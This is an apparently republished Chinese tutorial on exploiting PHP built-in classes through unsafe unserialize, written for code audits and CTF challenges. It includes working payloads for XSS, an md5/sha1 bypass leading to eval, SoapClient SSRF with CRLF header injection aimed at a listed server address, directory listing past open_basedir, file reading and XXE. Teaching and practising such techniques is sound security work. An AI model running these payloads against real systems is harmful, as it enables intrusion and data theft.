技術文章 » 深入瞭解PHP反序列化原生類

深入瞭解PHP反序列化原生類

2022-05-17 13:00:18
本篇文章給大家帶來了關於的相關知識,其中主要介紹了關於反序列化原生類的利用,如果在程式碼審計或者ctf中,有反序列化的功能點,但是卻不能構造出完整的pop鏈,那這時我們應該如何破局呢,下面一起來看一下,希望對大家有幫助。

推薦學習:《》

淺析php反序列化原生類的利用

如果在程式碼審計或者ctf中,有反序列化的功能點,但是卻不能構造出完整的pop鏈,那這時我們應該如何破局呢?我們可以嘗試一下從php原生類下手,php有些原生類中內建一些魔術方法,如果我們巧妙構造可控引數,觸發並利用其內建魔術方法,就有可能達到一些我們想要的目的。

一、常見魔術方法

__wakeup() //執行unserialize()時,先會呼叫這個函數
__sleep() //執行serialize()時,先會呼叫這個函數
__destruct() //物件被銷燬時觸發
__call() //在物件上下文中呼叫不可存取的方法時觸發
__callStatic() //在靜態上下文中呼叫不可存取的方法時觸發
__get() //用於從不可存取的屬性讀取資料或者不存在這個鍵都會呼叫此方法
__set() //用於將資料寫入不可存取的屬性
__isset() //在不可存取的屬性上呼叫isset()或empty()觸發
__unset() //在不可存取的屬性上使用unset()時觸發
__toString() //把物件當作字串使用時觸發
__invoke() //當嘗試將物件呼叫為函數時觸發

二、原生類中的魔術方法

我們採用下面指令碼遍歷一下所有原生類中的魔術方法

<?php$classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__toString',
            '__wakeup',
            '__call',
            '__callStatic',
            '__get',
            '__set',
            '__isset',
            '__unset',
            '__invoke',
            '__set_state'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }}

三、一些常見原生類的利用

Error/Exception

Error 是所有PHP內部錯誤類的基礎類別。 (PHP 7, 8)

**Error::__toString ** error 的字串表達

返回 Error 的 string表達形式。

Exception是所有使用者級異常的基礎類別。 (PHP 5, 7, 8)

**Exception::__toString ** 將異常物件轉換為字串

返回轉換為字串(string)型別的異常。

類屬性

  • message 錯誤訊息內容

  • code 錯誤程式碼

  • file 丟擲錯誤的檔名

  • line 丟擲錯誤的行數

XSS

__toString方法會返回錯誤或異常的字串形式,其中包含我們輸入的引數,如果我們構造一串xss程式碼,結合echo渲染,將觸發反射形xss漏洞

範例:

<?php$a = unserialize($_GET['a']);echo $a;

POC:

<?php$a = new Error("<script>alert('xss')</script>");$b = serialize($a);echo urlencode($b);

image-20220327114659883

hash繞過

先看一道題

[2020 極客大挑戰]Greatphp

<?phperror_reporting(0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }

        }
    }}if (isset($_GET['great'])){
    unserialize($_GET['great']);} else {
    highlight_file(__FILE__);}

需要繞過兩個hash強比較,且最終需要構造eval程式碼執行

顯然正常方法是行不通的,而通過原生類可進行繞過

同樣,當md5()和sha1()函數處理物件時,會自動呼叫__tostring方法

先簡單看一下其輸出

<?php$a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo $b."<br>";
echo $c."<br>";
echo $d;

image-20220322205917541

可以發現,這兩個原生類返回的資訊除了行號一模一樣,利用這點,我們可以嘗試進行hash函數的繞過,需要注意的是,必須將兩個傳入的物件放到同一行

因此我們可以進行簡單的測試,發現使用此方法可以繞過hash強(弱)函數比較

<?php$a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo '$a不等於$b'."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

image-20220324195852488

根據這些知識點,我們可以輕鬆構造payload

  <?phpclass SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
		   if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
			   eval($this->syc);
		   } else {
			   die("Try Hard !!");
		   }
		   
		}
	}}$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";//兩次取反繞過正則$a=new Error($str,1);
	$b=new Error($str,2);
	$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
	echo(urlencode(serialize($c)));?>

SoapClient

SoapClient是一個專門用來存取web服務的類,可以提供一個基於SOAP協定存取Web服務的 PHP 使用者端,可以建立soap資料包文,與wsdl介面進行互動

soap擴充套件模組預設關閉,使用時需手動開啟

SoapClient::__call —呼叫 SOAP 函數 (PHP 5, 7, 8)

通常,SOAP 函數可以作為SoapClient物件的方法呼叫

SSRF

建構函式:

public SoapClient :: SoapClient(mixed $wsdl [,array $options ])
第一個引數是用來指明是否是wsdl模式,如果為`null`,那就是非wsdl模式。
第二個引數為一個陣列,如果在wsdl模式下,此引數可選;如果在非wsdl模式下,則必須設定location和uri選項,其中location是要將請求傳送到的SOAP伺服器的URL,而uri 是SOAP服務的目標名稱空間。

什麼是soap

SOAP 是基於 XML 的簡易協定,是用在分散或分佈的環境中交換資訊的簡單的協定,可使應用程式在 HTTP 之上進行資訊交換
SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL 用來描述如何存取具體的介面, UDDI用來管理,分發,查詢webService ,SOAP(簡單物件存取協定)是連線或Web服務或使用者端和Web服務之間的介面。
其採用HTTP作為底層通訊協定,XML作為資料傳送的格式。

我們構造一個利用payload,第一個引數為NULL,第二個引數的location設定為vps地址

<?php
$a = new SoapClient(null, array(
'location' => 'http://47.102.146.95:2333', 
'uri' =>'uri',
'user_agent'=>'111111'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();

監聽vps的2333埠,如下圖所示成功觸發SSRF,vps收到了請求資訊

且可以看到SOAPAction和user_agent都可控

image-20220326202151356

本地測試時發現,當使用此內建類(即soap協定)請求存在服務的埠時,會立即報錯,而去存取不存在服務(未佔用)的埠時,會等待一段時間報錯,可以以此進行內網資產的探測。

如果配合CRLF漏洞,還可以可通過 SoapClient 來控制其他引數或者post傳送資料。例如:HTTP協定去攻擊Redis

CRLF知識擴充套件

HTTP報文的結構:狀態行和首部中的每行以CRLF結束,首部與主體之間由一空行分隔。
CRLF注入漏洞,是因為Web應用沒有對使用者輸入做嚴格驗證,導致攻擊者可以輸入一些惡意字元。
攻擊者一旦向請求行或首部中的欄位注入惡意的CRLF(\r\n),就能注入一些首部欄位或報文主體,並在響應中輸出。

通過結合CRLF,我們利用SoapClient+CRLF便可以幹更多的事情,例如插入自定義Cookie,

<?php$a = new SoapClient(null, array(
    'location' => 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

image-20220326204543138

傳送POST的封包,這裡需要將Content-Type設定為application/x-www-form-urlencoded,我們可以通過新增兩個\r\n來將原來的Content-Type擠下去,自定義一個新的Content-Type

<?php$a = new SoapClient(null, array(
    'location' => 'http://47.102.146.95:2333',
    'uri' =>'uri',
    'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));
    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

image-20220326205821109

看一道ctfshow上的題,完美利用上述知識點

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff); //獲取xff頭


if($ip!=='127.0.0.1'){
    die('error');
}else{
    $token = $_POST['token'];
    if($token=='ctfshow'){
        file_put_contents('flag.txt',$flag);
    }
}

poc:

<?php
$target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator類提供了一個簡單的介面來檢視檔案系統目錄的內容。

DirectoryIterator::__toString 獲取字串形式的檔名 (PHP 5,7,8)

目錄遍歷

使用此內建類的__toString方法結合glob或file協定,即可實現目錄遍歷

例如:

<?php
$a = new DirectoryIterator("glob:///*");
foreach ($a as $b){
    echo $b.'<br>';
}

FilesystemIterator繼承於DirectoryIterator,兩者作用和用法基本相同,區別為FilesystemIterator會顯示檔案的完整路徑,而DirectoryIterator只顯示檔名

image-20220329185934148

因為可以配合使用glob偽協定(查詢匹配的檔案路徑模式),所以可以繞過open_basedir的限制

在php4.3以後使用了zend_class_unserialize_deny來禁止一些類的反序列化,很不幸的是這兩個原生類都在禁止名單當中

SplFileObject

SplFileObject 類為單個檔案的資訊提供了一個物件導向的高階介面

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

檔案讀取

SplFileObject::__toString — 以字串形式返回檔案的路徑

<?phphighlight_file(__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果沒有遍歷的話只能讀取第一行,且受到open_basedir影響

SimpleXMLElement

解析XML 檔案中的元素。 (PHP 5、PHP 7、PHP 8)

SimpleXMLElement::__construct — 建立一個新的 SimpleXMLElement 物件

XXE

我們檢視一下其引數:

image-20220324204259723

根據官方檔案,發現當第三個引數為True時,即可實現遠端xml檔案載入,第二個引數的常數值設定為2即可。

利用可參考賽題:[SUCTF 2018]Homework

ReflectionMethod

獲取註釋內容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 獲取註釋內容
由該原生類中的getDocComment方法可以存取到註釋的內容

image-20220331175819047

同時可利用的原生類還有ZipArchive– 刪除檔案等等,不在敘述

推薦學習:《》

以上就是深入瞭解PHP反序列化原生類的詳細內容,更多請關注TW511.COM其它相關文章!